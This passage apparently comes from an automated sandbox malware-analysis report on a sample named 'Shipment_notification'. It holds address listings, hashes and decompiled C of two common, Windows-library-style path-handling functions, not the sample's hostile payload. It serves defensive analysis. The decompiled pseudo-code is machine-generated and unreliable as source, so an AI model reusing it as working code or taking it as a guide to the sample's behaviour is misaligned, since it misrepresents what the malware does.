                                                                                0x01bb61d0
                                                                                0x01bb61dc
                                                                                0x01bb61de
                                                                                0x01bb61e1
                                                                                0x01bb61e4
                                                                                0x01bb61e6
                                                                                0x01bb61e8
                                                                                0x01bb61e8
                                                                                0x01bb61e8
                                                                                0x01bb61e8
                                                                                0x01bb61e6
                                                                                0x01bb61ec
                                                                                0x01bb61f3
                                                                                0x01bb6203
                                                                                0x01bb6209
                                                                                0x01bb620a
                                                                                0x01bb6216
                                                                                0x01bb621d
                                                                                0x01bb6227
                                                                                0x01bb6241
                                                                                0x01bb6246
                                                                                0x01bb624c
                                                                                0x01bb6257
                                                                                0x01bb6259
                                                                                0x01bb625c
                                                                                0x01bb625e
                                                                                0x01bb6260
                                                                                0x01bb6260
                                                                                0x01bb6260
                                                                                0x01bb6260
                                                                                0x01bb625e
                                                                                0x01bb6264
                                                                                0x01bb6267
                                                                                0x01bb6269
                                                                                0x01bb6315
                                                                                0x01bb6315
                                                                                0x01bb631b
                                                                                0x01bb631e
                                                                                0x01bb6324
                                                                                0x01bb6327
                                                                                0x01bb632f
                                                                                0x01bb6330
                                                                                0x01bb6333
                                                                                0x01bb633a
                                                                                0x01bb633c
                                                                                0x01bb6335
                                                                                0x01bb6335
                                                                                0x01bb6335
                                                                                0x01bb633f
                                                                                0x01bb6342
                                                                                0x01bb634c
                                                                                0x01bb6352
                                                                                0x01bb6355
                                                                                0x01bb6355
                                                                                0x01bb6359
                                                                                0x00000000
                                                                                0x01bb626f
                                                                                0x01bb6275
                                                                                0x01bb6275
                                                                                0x01bb6278
                                                                                0x01bb627e
                                                                                0x01bb627e
                                                                                0x01bb6281
                                                                                0x01bb6287
                                                                                0x01bb628d
                                                                                0x01bb6298
                                                                                0x01bb629c
                                                                                0x01bb62a2
                                                                                0x01bb629e
                                                                                0x01bb629e
                                                                                0x01bb629e
                                                                                0x01bb62a7
                                                                                0x01bb62a7
                                                                                0x01bb62aa
                                                                                0x01bb62b0
                                                                                0x01bb62f0
                                                                                0x01bb62f0
                                                                                0x01bb62f2
                                                                                0x01bb62f8
                                                                                0x01bb62fd
                                                                                0x01bb62b2
                                                                                0x01bb62b2
                                                                                0x01bb62b2
                                                                                0x01bb62b5
                                                                                0x01bb62dd
                                                                                0x01bb62e2
                                                                                0x01bb62e5
                                                                                0x01bb62b7
                                                                                0x01bb62b8
                                                                                0x01bb62bb
                                                                                0x01bb62bd
                                                                                0x01bb62c0
                                                                                0x01bb62c4
                                                                                0x01bb62cd
                                                                                0x01bb62cd
                                                                                0x01bb62c0
                                                                                0x01bb62bb
                                                                                0x01bb62b5
                                                                                0x01bb6302
                                                                                0x01bb6303
                                                                                0x01bb6305
                                                                                0x01bb6305
                                                                                0x01bb6305
                                                                                0x01bb630c
                                                                                0x01bb630c
                                                                                0x00000000
                                                                                0x01bb627e
                                                                                0x01bb6269
                                                                                0x01bb5eac
                                                                                0x01bb5ebb
                                                                                0x01bb5ebe
                                                                                0x01bb5ecb
                                                                                0x01bb5ecb
                                                                                0x01bb5ece
                                                                                0x01bb5ece
                                                                                0x01bb5ed4
                                                                                0x01bb5ed7
                                                                                0x01bb5ed9
                                                                                0x01bb5edb
                                                                                0x01bb5edb
                                                                                0x01bb5ee1
                                                                                0x01bb5ee1
                                                                                0x01bb5ee3
                                                                                0x01bb5f20
                                                                                0x01bb5f20
                                                                                0x01bb5ee5
                                                                                0x01bb5ee5
                                                                                0x01bb5ee5
                                                                                0x01bb5ee8
                                                                                0x01bb5f11
                                                                                0x01bb5f18
                                                                                0x01bb5eea
                                                                                0x01bb5eea
                                                                                0x01bb5eed
                                                                                0x01bb5ef2
                                                                                0x01bb5ef8
                                                                                0x01bb5efb
                                                                                0x01bb5f0a
                                                                                0x01bb5f0a
                                                                                0x01bb5eed
                                                                                0x01bb5ee8
                                                                                0x01bb5f22
                                                                                0x01bb5f28
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5f30
                                                                                0x01bb5f31
                                                                                0x01bb5f37
                                                                                0x01bb5f3a
                                                                                0x01bb5f3d
                                                                                0x01bb5f44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5f46
                                                                                0x01bb5f48
                                                                                0x01bb5f4d
                                                                                0x00000000
                                                                                0x01bb5f4d
                                                                                0x01bb5dda
                                                                                0x01bb5ddf
                                                                                0x00000000
                                                                                0x01bb5ddf
                                                                                0x01bb5dd8
                                                                                0x01bb5da7
                                                                                0x01bb5da9
                                                                                0x01bb5dac
                                                                                0x01bb5dae
                                                                                0x00000000
                                                                                0x01bb5db4
                                                                                0x01bb5db4
                                                                                0x00000000
                                                                                0x01bb5db4
                                                                                0x01bb5dae
                                                                                0x01bb5d88
                                                                                0x01bb5d8d
                                                                                0x01bb6363
                                                                                0x01bb6369
                                                                                0x01bb636a
                                                                                0x01bb6370
                                                                                0x01bb6372
                                                                                0x01bb637a
                                                                                0x01bb637b
                                                                                0x01bb637d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb637f
                                                                                0x01bb6385
                                                                                0x00000000
                                                                                0x01bb6385
                                                                                0x01bb5d38
                                                                                0x01bb5d3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d3b
                                                                                0x01bb5d27
                                                                                0x01bb5d29
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb6360
                                                                                0x00000000
                                                                                0x01bb6360
                                                                                0x01bb5c10
                                                                                0x01bb5c10
                                                                                0x01bb63da
                                                                                0x01bb63e5
                                                                                0x01bb63e5

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f34018e70198b5c0edab69bc899c2d763b38dbe6e7db2c51f9c562aa04a02ed
                                                                                • Instruction ID: 542140ff78b19d544b18685b09472d24baf2e998beb84138b343c88453414863
                                                                                • Opcode Fuzzy Hash: 1f34018e70198b5c0edab69bc899c2d763b38dbe6e7db2c51f9c562aa04a02ed
                                                                                • Instruction Fuzzy Hash: 89425A71901229CFDB28CF68C880BE9BBB1FF49304F1481EAD94DAB642E7749985CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B04120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E01B04120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1bdd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E01B1F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L01B06E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01B04620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01B06E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M01B045F8))) {
												case 0:
													_v568 = 0x1ac1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1ac11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01B04620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E01B2F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E01B2F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E01AE52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E01AFEB70(1, 0x1bd79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E01AFAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E01B295D0();
																			L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L01B2B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01B23D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L01B2B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                0x01b04128
                                                                                0x01b04135
                                                                                0x01b0413c
                                                                                0x01b04141
                                                                                0x01b04145
                                                                                0x01b04147
                                                                                0x01b0414e
                                                                                0x01b04151
                                                                                0x01b04159
                                                                                0x01b0415c
                                                                                0x01b04160
                                                                                0x01b04164
                                                                                0x01b04168
                                                                                0x01b0416c
                                                                                0x01b0417f
                                                                                0x01b04181
                                                                                0x01b0446a
                                                                                0x01b0446a
                                                                                0x01b0418c
                                                                                0x01b04195
                                                                                0x01b04199
                                                                                0x01b04432
                                                                                0x01b04439
                                                                                0x01b0443d
                                                                                0x01b04442
                                                                                0x01b04447
                                                                                0x00000000
                                                                                0x01b0419f
                                                                                0x01b041a3
                                                                                0x01b041b1
                                                                                0x01b041b9
                                                                                0x01b041bd
                                                                                0x01b045db
                                                                                0x01b045db
                                                                                0x00000000
                                                                                0x01b041c3
                                                                                0x01b041c3
                                                                                0x01b041ce
                                                                                0x01b041d4
                                                                                0x01b4e138
                                                                                0x01b4e13e
                                                                                0x01b4e169
                                                                                0x01b4e16d
                                                                                0x01b4e19e
                                                                                0x01b4e16f
                                                                                0x01b4e16f
                                                                                0x01b4e175
                                                                                0x01b4e179
                                                                                0x01b4e18f
                                                                                0x01b4e193
                                                                                0x00000000
                                                                                0x01b4e199
                                                                                0x00000000
                                                                                0x01b4e199
                                                                                0x01b4e193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b041da
                                                                                0x01b041da
                                                                                0x01b041df
                                                                                0x01b041e4
                                                                                0x01b041ec
                                                                                0x01b04203
                                                                                0x01b04207
                                                                                0x01b4e1fd
                                                                                0x01b04222
                                                                                0x01b04226
                                                                                0x01b4e1f3
                                                                                0x01b4e1f3
                                                                                0x01b0422c
                                                                                0x01b0422c
                                                                                0x01b04233
                                                                                0x01b4e1ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b04239
                                                                                0x01b04239
                                                                                0x01b04239
                                                                                0x01b04239
                                                                                0x01b04233
                                                                                0x01b04226
                                                                                0x01b041ee
                                                                                0x01b041ee
                                                                                0x01b041f4
                                                                                0x01b04575
                                                                                0x01b4e1b1
                                                                                0x01b4e1b1
                                                                                0x00000000
                                                                                0x01b0457b
                                                                                0x01b0457b
                                                                                0x01b04582
                                                                                0x01b4e1ab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b04588
                                                                                0x01b04588
                                                                                0x01b0458c
                                                                                0x01b4e1c4
                                                                                0x01b4e1c4
                                                                                0x00000000
                                                                                0x01b04592
                                                                                0x01b04592
                                                                                0x01b04599
                                                                                0x01b4e1be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0459f
                                                                                0x01b0459f
                                                                                0x01b045a3
                                                                                0x01b4e1d7
                                                                                0x01b4e1e4
                                                                                0x00000000
                                                                                0x01b045a9
                                                                                0x01b045a9
                                                                                0x01b045b0
                                                                                0x01b4e1d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b045b6
                                                                                0x01b045b6
                                                                                0x01b045b6
                                                                                0x00000000
                                                                                0x01b045b6
                                                                                0x01b045b0
                                                                                0x01b045a3
                                                                                0x01b04599
                                                                                0x01b0458c
                                                                                0x01b04582
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b041f4
                                                                                0x01b0423e
                                                                                0x01b04241
                                                                                0x01b045c0
                                                                                0x01b045c4
                                                                                0x00000000
                                                                                0x01b045ca
                                                                                0x01b045ca
                                                                                0x00000000
                                                                                0x01b4e207
                                                                                0x01b4e20f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b045d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b045ca
                                                                                0x00000000
                                                                                0x01b04247
                                                                                0x01b04247
                                                                                0x01b04247
                                                                                0x01b04249
                                                                                0x01b04249
                                                                                0x01b04249
                                                                                0x01b04251
                                                                                0x01b04251
                                                                                0x01b04257
                                                                                0x01b0425f
                                                                                0x01b0426e
                                                                                0x01b04270
                                                                                0x01b0427a
                                                                                0x01b4e219
                                                                                0x01b4e219
                                                                                0x01b04280
                                                                                0x01b04282
                                                                                0x01b04456
                                                                                0x01b045ea
                                                                                0x00000000
                                                                                0x01b045f0
                                                                                0x01b4e223
                                                                                0x00000000
                                                                                0x01b4e223
                                                                                0x01b0445c
                                                                                0x01b0445c
                                                                                0x00000000
                                                                                0x01b0445c
                                                                                0x00000000
                                                                                0x01b04288
                                                                                0x01b0428c
                                                                                0x01b4e298
                                                                                0x01b04292
                                                                                0x01b04292
                                                                                0x01b0429e
                                                                                0x01b042a3
                                                                                0x01b042a7
                                                                                0x01b042ac
                                                                                0x01b4e22d
                                                                                0x01b042b2
                                                                                0x01b042b2
                                                                                0x01b042b9
                                                                                0x01b042bc
                                                                                0x01b042c2
                                                                                0x01b042ca
                                                                                0x01b042cd
                                                                                0x01b042cd
                                                                                0x01b042d4
                                                                                0x01b0433f
                                                                                0x01b0433f
                                                                                0x01b042d6
                                                                                0x01b042d6
                                                                                0x01b042d9
                                                                                0x01b042dd
                                                                                0x01b042eb
                                                                                0x01b4e23a
                                                                                0x01b042f1
                                                                                0x01b04305
                                                                                0x01b0430d
                                                                                0x01b04315
                                                                                0x01b04318
                                                                                0x01b0431f
                                                                                0x01b04322
                                                                                0x01b0432e
                                                                                0x01b0433b
                                                                                0x01b0433b
                                                                                0x00000000
                                                                                0x01b0432e
                                                                                0x01b042eb
                                                                                0x01b0434c
                                                                                0x01b0434e
                                                                                0x01b04352
                                                                                0x01b04359
                                                                                0x01b0435e
                                                                                0x01b04361
                                                                                0x01b0436e
                                                                                0x01b0438a
                                                                                0x01b0438e
                                                                                0x01b04396
                                                                                0x01b0439e
                                                                                0x01b043a1
                                                                                0x01b043ad
                                                                                0x01b043bb
                                                                                0x01b043bb
                                                                                0x01b043ad
                                                                                0x01b0436e
                                                                                0x01b043bf
                                                                                0x01b043c5
                                                                                0x01b04463
                                                                                0x01b04463
                                                                                0x01b043ce
                                                                                0x01b043d5
                                                                                0x01b043d9
                                                                                0x01b043df
                                                                                0x01b04475
                                                                                0x01b04479
                                                                                0x01b04491
                                                                                0x01b04491
                                                                                0x01b04479
                                                                                0x01b043e5
                                                                                0x01b043eb
                                                                                0x01b043f4
                                                                                0x01b043f6
                                                                                0x01b043f9
                                                                                0x01b043fc
                                                                                0x01b043ff
                                                                                0x01b044e8
                                                                                0x01b044ed
                                                                                0x01b044f3
                                                                                0x01b4e247
                                                                                0x00000000
                                                                                0x01b044f9
                                                                                0x01b04504
                                                                                0x01b04508
                                                                                0x01b0450f
                                                                                0x01b4e269
                                                                                0x00000000
                                                                                0x01b04515
                                                                                0x01b04519
                                                                                0x01b04531
                                                                                0x01b04534
                                                                                0x01b04537
                                                                                0x01b0453e
                                                                                0x01b04541
                                                                                0x01b0454a
                                                                                0x01b4e255
                                                                                0x01b4e255
                                                                                0x01b4e25b
                                                                                0x01b4e25e
                                                                                0x01b4e261
                                                                                0x01b4e261
                                                                                0x01b04555
                                                                                0x01b04559
                                                                                0x01b0455d
                                                                                0x01b4e26d
                                                                                0x01b4e270
                                                                                0x01b4e274
                                                                                0x01b4e27a
                                                                                0x01b4e27d
                                                                                0x01b4e28e
                                                                                0x01b4e28e
                                                                                0x01b04563
                                                                                0x01b04563
                                                                                0x01b04569
                                                                                0x01b04569
                                                                                0x00000000
                                                                                0x01b0455d
                                                                                0x01b0450f
                                                                                0x00000000
                                                                                0x01b044f3
                                                                                0x01b043ff
                                                                                0x01b04405
                                                                                0x01b04405
                                                                                0x01b04405
                                                                                0x01b042ac
                                                                                0x01b0428c
                                                                                0x01b04282
                                                                                0x01b04407
                                                                                0x01b0440d
                                                                                0x01b4e2af
                                                                                0x01b4e2af
                                                                                0x01b04413
                                                                                0x01b04413
                                                                                0x00000000
                                                                                0x01b041d4
                                                                                0x00000000
                                                                                0x01b041c3
                                                                                0x01b041bd
                                                                                0x01b04415
                                                                                0x01b04415
                                                                                0x01b04416
                                                                                0x01b04417
                                                                                0x01b04429
                                                                                0x01b0416e
                                                                                0x01b0416e
                                                                                0x01b04175
                                                                                0x01b04498
                                                                                0x01b0449f
                                                                                0x01b4e12d
                                                                                0x00000000
                                                                                0x01b4e133
                                                                                0x00000000
                                                                                0x01b4e133
                                                                                0x01b044a5
                                                                                0x01b044a5
                                                                                0x01b044aa
                                                                                0x00000000
                                                                                0x01b044bb
                                                                                0x01b044ca
                                                                                0x01b044d6
                                                                                0x01b044d7
                                                                                0x01b044d8
                                                                                0x01b044e3
                                                                                0x01b044e3
                                                                                0x01b044aa
                                                                                0x01b0417b
                                                                                0x01b0417b
                                                                                0x01b0417b
                                                                                0x00000000
                                                                                0x01b0417b
                                                                                0x01b04175
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b58458bb95e1e319cc0e9721dfc5d95ae51803d06047cdf08c812f6f73a1291
                                                                                • Instruction ID: 11c886d8c557c6699e667f34e513ab2ce08a9fa995aa66c0d66a1acfcda8c6a8
                                                                                • Opcode Fuzzy Hash: 6b58458bb95e1e319cc0e9721dfc5d95ae51803d06047cdf08c812f6f73a1291
                                                                                • Instruction Fuzzy Hash: 43F190706083118FC729CF59C480A7ABBE1FF88754F0589AEF686CB291E735D885CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B120A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E01B120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1bd8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
